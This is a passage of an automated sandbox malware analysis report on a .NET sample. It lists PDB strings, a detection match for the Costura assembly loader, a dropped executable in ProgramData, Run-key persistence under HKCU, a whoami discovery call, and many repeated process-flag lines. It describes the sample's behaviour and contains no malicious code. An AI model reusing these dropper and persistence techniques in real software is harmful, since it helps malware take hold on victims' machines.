                          Source: Binary string: System.Net.Http.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Drawing.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Management.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: svrreve.PDBdQ source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.Management.ni.pdb source: WER2B3B.tmp.dmp.17.dr
                          Source: Binary string: System.Core.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: indoC:\Windows\mscorlib.pdb source: svrreve.exe, 00000002.00000002.2287704101.000000B5990F5000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdb source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER2B3B.tmp.dmp.17.dr, WER18AD.tmp.dmp.15.dr, WER6CB.tmp.dmp.12.dr

                          Data Obfuscation

                          barindex
                          .NET source code contains potential unpacker
                          Source: ubes6SC7Vd.exe, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                          Yara detected Costura Assembly Loader
                          Source: Yara matchFile source: ubes6SC7Vd.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.ubes6SC7Vd.exe.258f28f65d4.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.ubes6SC7Vd.exe.258f28f0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000002.2301901265.000001DD56A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.2276827527.000001B08F751000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2289800804.0000026DC0DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1857818205.0000025880001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1687370695.00000258F28F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ubes6SC7Vd.exe PID: 7268, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svrreve.exe PID: 7536, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svrreve.exe PID: 7924, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svrreve.exe PID: 8076, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\uovan\svrreve.exe, type: DROPPED
                          Source: ubes6SC7Vd.exeStatic PE information: 0x95B82278 [Fri Aug 6 14:23:52 2049 UTC]
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeCode function: 0_2_00007FFD9BA12C7A pushad ; iretd 0_2_00007FFD9BA12C7D
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 2_2_00007FFD9BA112D8 push cs; retn FDF8h2_2_00007FFD9BA11472
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 2_2_00007FFD9BA12C7A pushad ; iretd 2_2_00007FFD9BA12C7D
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 9_2_00007FFD9B9F2C7A pushad ; iretd 9_2_00007FFD9B9F2C7D
                          Source: C:\ProgramData\uovan\svrreve.exeCode function: 13_2_00007FFD9BA02C7A pushad ; iretd 13_2_00007FFD9BA02C7D
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile created: C:\ProgramData\uovan\svrreve.exeJump to dropped file
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeFile created: C:\ProgramData\uovan\svrreve.exeJump to dropped file

                          Boot Survival

                          barindex
                          Uses whoami command line tool to query computer and username
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoami
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\whoami.exe whoamiJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XohtstsJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XohtstsJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\ubes6SC7Vd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\uovan\svrreve.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
